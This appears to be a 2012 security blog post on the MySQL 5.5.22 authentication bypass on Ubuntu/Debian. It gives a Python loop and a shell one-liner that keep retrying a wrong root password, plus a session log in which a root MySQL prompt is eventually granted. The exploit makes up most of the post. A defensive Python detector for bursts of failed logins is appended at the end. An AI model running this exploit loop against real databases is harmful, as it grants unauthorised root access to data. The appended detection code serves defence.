Jun 11, 2012

MySQL Authentication Bypass Vulnerability on Ubuntu (*updated Python script)

This vulnerability was made public by @hdmoore, @jcran, @jduck1337 and other security experts on my Twitter feed.

This vulnerability affects Ubuntu/Debian 32/64-bit with MySQL 5.5.22; it does not work on RHEL/CentOS 5 and 6 (x86_64).

Python script for this vulnerability

import subprocess

# Run the mysql client with a wrong password in a loop, waiting for each attempt to exit
while True:
    subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()

Details here: http://seclists.org/oss-sec/2012/q2/493

hdm@grunt:~$ while true; do mysql -u root mysql --password=baha; done
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
< snip >
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1248
Server version: 5.5.22-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.


Source: http://pastie.org/private/903voijkkz8nmde3yqj4rw
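
A defender-side example, added here and not part of the original post: the session above reaches the bypass by repeating a failed login until one attempt is accepted, so a burst of "Access denied" entries for one account is the signal to alert on. It assumes the server logs failed logins; the timestamp layout, the `[Warning]` prefix, the thresholds and the sample lines are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Message text as shown in the session above; the leading "YYMMDD HH:MM:SS"
# timestamp layout is an assumption about the server's log format.
DENIED = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d{2}:\d{2}).*"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def find_auth_bursts(lines, threshold=20, window_seconds=60):
    """Return {(user, host): time the failure count first hit the threshold}."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # per-account timestamps inside the window
    alerts = {}
    for line in lines:
        m = DENIED.match(line)
        if not m:
            continue
        stamp = " ".join(m.group("ts").split())  # collapse space-padded hour
        ts = datetime.strptime(stamp, "%y%m%d %H:%M:%S")
        key = (m.group("user"), m.group("host"))
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts

def sample_log(step_seconds=1):
    """Constructed sample: 30 root failures, 3 unrelated ones, 1 other line."""
    base = datetime(2012, 6, 11, 10, 15, 0)
    msg = "{} [Warning] Access denied for user '{}'@'{}' (using password: YES)"
    lines = [
        msg.format((base + timedelta(seconds=i * step_seconds))
                   .strftime("%y%m%d %H:%M:%S"), "root", "localhost")
        for i in range(30)
    ]
    lines += [msg.format("120611  9:0%d:00" % i, "app", "10.0.0.5")
              for i in range(3)]
    lines.append("120611 10:16:00 [Note] Event Scheduler: Loaded 0 events")
    return lines

if __name__ == "__main__":
    for (user, host), when in find_auth_bursts(sample_log()).items():
        print("burst of failed logins for %s@%s at %s" % (user, host, when))
```
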
